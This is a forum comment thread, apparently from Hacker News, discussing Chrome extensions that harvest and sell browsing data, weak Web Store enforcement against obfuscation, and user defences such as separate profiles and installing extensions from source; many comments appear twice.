I was optimistically hoping some of the MV3 changes would result in Chrome webstore policy enforcement being standardized, but that hasn't happened.
Sensor Tower (https://sensortower.com/) makes a lot of popular extensions, like StayFocusd https://www.stayfocusd.com/. They seem to resell ad data (in violation of [1]?) and ship likely obfuscated code [2] (in violation of [3]?), but there's no enforcement or even clear reporting mechanism.
Event with MV3 you still have access to `chrome.webRequest.onBeforeRequest` and content scripts, so this particular issue won't be 100% solved.
I don't think the solution is technical. The solution would be a strict policy, and nuke every extension and publisher from the store who even hints at doing this kind of BS.
I am absolutely flabbergasted at the fact that Chrome extension security is the way it is, considering how much Google spends to keep chrome secure.
How is it, in 2024, users can still blindly install malicious software directly into their browser from a web store with Google’s name at the top of it?
This goes to show even the most cautious and conscientious of users can get caught out by their extension changing hands. What, is Google expecting us to review our extensions, and their permissions, and their authors, and their authors’ associated businesses, every time we want to use our computer?
Additionally, are we even able to review the source code of extensions if they are not open source?
> I am absolutely flabbergasted at the fact that Chrome extension security is the way it is, considering how much Google spends to keep chrome secure.
It's crazy and it's not even a "Google Scale" problem. There are only around 2,000 extensions that are popular (100k+ users) and the co-ordinated malicious activity is super blatant.
> Additionally, are we even able to review the source code of extensions if they are not open source?
Yes and you can even do this without installing the code by downloading the zip file (that contains the extension code) by using the extensionId + a get request (or using a browser)
You can unpack and view the code of any extension after you've installed it. There's even a rule against obfuscation, though I'm not sure how enforced that is.
A Chrome extension is basically a zip archive with a bunch of JavaScript inside. There's no safeguarding of the code within.
Does that only cover the background/web-worker or does it also include the UI parts (popup, content-ui, dev-tools...) ? That would make using something like React or Vue almost impossible.
There was a question raised but not really answered about "what do these extensions what with all this browsing data?" - while it may be that they're used for direct ad targeting (like real time ad buying against your IP address) it's more likely that they're selling "click stream" data.
In its most innocuous form, this is stuff like SimilarWeb (which is like a more advanced Google Trends), but in the B2B world, it's also custom enterprise reports that are like "how many people that use our bank at xyz also use any other bank at this array of domains and which are most common?"
I've decided that browser extensions are too much of a security/privacy risk.
I just stick with 1password extension and an ad blocker extension that uses Safari's Content Blocker API only.
And then from time to time I have a dedicated profile on Chrome to use other extensions that might be useful, but I don't do day-to-day browsing there.
Is there any way to only allow chrome extensions to update with permission? It seems like any extension on the store could become malicious overnight, automatically, for millions of users.
Most users have no way to vet a chrome extension update (or on initial install). If we want strong security for everyone, we need better solutions than that
AFAIK there are two ways for this, neither of which is convenient to use: install all extensions from the source (you can unpack an existing crx for it or use their clonned repo if it's opensource) or use a group policy to disable extensions autoupdate and update each of them manually when the new version has something you want.
I don't think so. However, extensions are automatically disabled if they request more permissions. And in Manifest v3 most extensions won't have access to most pages unless you click on them.
Personally I have 15 extensions installed. Only four of them have access to all sites, and two of those are because they are not updated to Manifest v3 yet. I didn't say it was impossible for a Manifest v3 extension to have access to all sites. Most will not.
Can a firewall rule distinguish between an extension update and a new install? Would blocking the entire chrome web store cause other problems in chrome?
Most people aren't (or at least feel they aren't) able to take a hardline stance about only using free software, but if there's one area of your digital life you should be able to apply it to, it's browser extensions.
I was optimistically hoping some of the MV3 changes would result in Chrome webstore policy enforcement being standardized, but that hasn't happened.
Sensor Tower (https://sensortower.com/) makes a lot of popular extensions, like StayFocusd https://www.stayfocusd.com/. They seem to resell ad data (in violation of [1]?) and ship likely obfuscated code [2] (in violation of [3]?), but there's no enforcement or even clear reporting mechanism.
[1] https://developer.chrome.com/docs/webstore/program-policies/...
[2] https://robwu.nl/crxviewer/?crx=https%3A%2F%2Fclients2.googl...
[3] https://developer.chrome.com/docs/webstore/program-policies/...
Event with MV3 you still have access to `chrome.webRequest.onBeforeRequest` and content scripts, so this particular issue won't be 100% solved.
I don't think the solution is technical. The solution would be a strict policy, and nuke every extension and publisher from the store who even hints at doing this kind of BS.
I am absolutely flabbergasted at the fact that Chrome extension security is the way it is, considering how much Google spends to keep chrome secure.
How is it, in 2024, users can still blindly install malicious software directly into their browser from a web store with Google’s name at the top of it?
This goes to show even the most cautious and conscientious of users can get caught out by their extension changing hands. What, is Google expecting us to review our extensions, and their permissions, and their authors, and their authors’ associated businesses, every time we want to use our computer?
Additionally, are we even able to review the source code of extensions if they are not open source?
> I am absolutely flabbergasted at the fact that Chrome extension security is the way it is, considering how much Google spends to keep chrome secure.
It's crazy and it's not even a "Google Scale" problem. There are only around 2,000 extensions that are popular (100k+ users) and the co-ordinated malicious activity is super blatant.
> Additionally, are we even able to review the source code of extensions if they are not open source?
Yes and you can even do this without installing the code by downloading the zip file (that contains the extension code) by using the extensionId + a get request (or using a browser)
You can unpack and view the code of any extension after you've installed it. There's even a rule against obfuscation, though I'm not sure how enforced that is.
A Chrome extension is basically a zip archive with a bunch of JavaScript inside. There's no safeguarding of the code within.
> There's even a rule against obfuscation
This is definitely not enforced. I’ve downloaded multiple extensions in the past when I wanted to learn how they worked. All of them were obfuscated.
edit: saw the below comment and editing before this gets questioned. I’m not talking about minification. It was definitely obfuscation.
> There's even a rule against obfuscation
Does that only cover the background/web-worker or does it also include the UI parts (popup, content-ui, dev-tools...) ? That would make using something like React or Vue almost impossible.
There's no rule against minification, which I assume is what you're referring to when you say it would make using React or Vue impossible.
There's a difference between minification and obfuscation, but again, I'm not sure how they adjudicate it or how much they enforce it.
> This goes to show even the most cautious and conscientious of users can get caught out by their extension changing hands
That's why on chromium I only install extensions that have their source on GitHub, as unpacked extensions.
There was a question raised but not really answered about "what do these extensions what with all this browsing data?" - while it may be that they're used for direct ad targeting (like real time ad buying against your IP address) it's more likely that they're selling "click stream" data.
In its most innocuous form, this is stuff like SimilarWeb (which is like a more advanced Google Trends), but in the B2B world, it's also custom enterprise reports that are like "how many people that use our bank at xyz also use any other bank at this array of domains and which are most common?"
Note: I am the author of this article.
That question is answered, in the last section of the article. And: yes, they are selling it, as they admit in the privacy policy.
I've decided that browser extensions are too much of a security/privacy risk. I just stick with 1password extension and an ad blocker extension that uses Safari's Content Blocker API only.
And then from time to time I have a dedicated profile on Chrome to use other extensions that might be useful, but I don't do day-to-day browsing there.
I'm similar
I have all relatives set up with a separate browser for e.g. banking, and it has no extensions at all
then the usual internet browsing one with the security nightmare than is the chrome/firefox app store
Is there any way to only allow chrome extensions to update with permission? It seems like any extension on the store could become malicious overnight, automatically, for millions of users.
Most users have no way to vet a chrome extension update (or on initial install). If we want strong security for everyone, we need better solutions than that
Here is one workaround: if you have to use a Chrome extension, make a separate profile just for that task. Don’t run any by default.
AFAIK there are two ways for this, neither of which is convenient to use: install all extensions from the source (you can unpack an existing crx for it or use their clonned repo if it's opensource) or use a group policy to disable extensions autoupdate and update each of them manually when the new version has something you want.
I don't think so. However, extensions are automatically disabled if they request more permissions. And in Manifest v3 most extensions won't have access to most pages unless you click on them.
> And in Manifest v3 most extensions won't have access to most pages unless you click on them.
That's not necessarily true.
Personally I have 15 extensions installed. Only four of them have access to all sites, and two of those are because they are not updated to Manifest v3 yet. I didn't say it was impossible for a Manifest v3 extension to have access to all sites. Most will not.
> Is there any way to only allow chrome extensions to update with permission?
With a firewall.
Can a firewall rule distinguish between an extension update and a new install? Would blocking the entire chrome web store cause other problems in chrome?
Why is Google not policing this? Liability concerns?
Not reliably detectable by machines, not willing to allocate humans.
Most people aren't (or at least feel they aren't) able to take a hardline stance about only using free software, but if there's one area of your digital life you should be able to apply it to, it's browser extensions.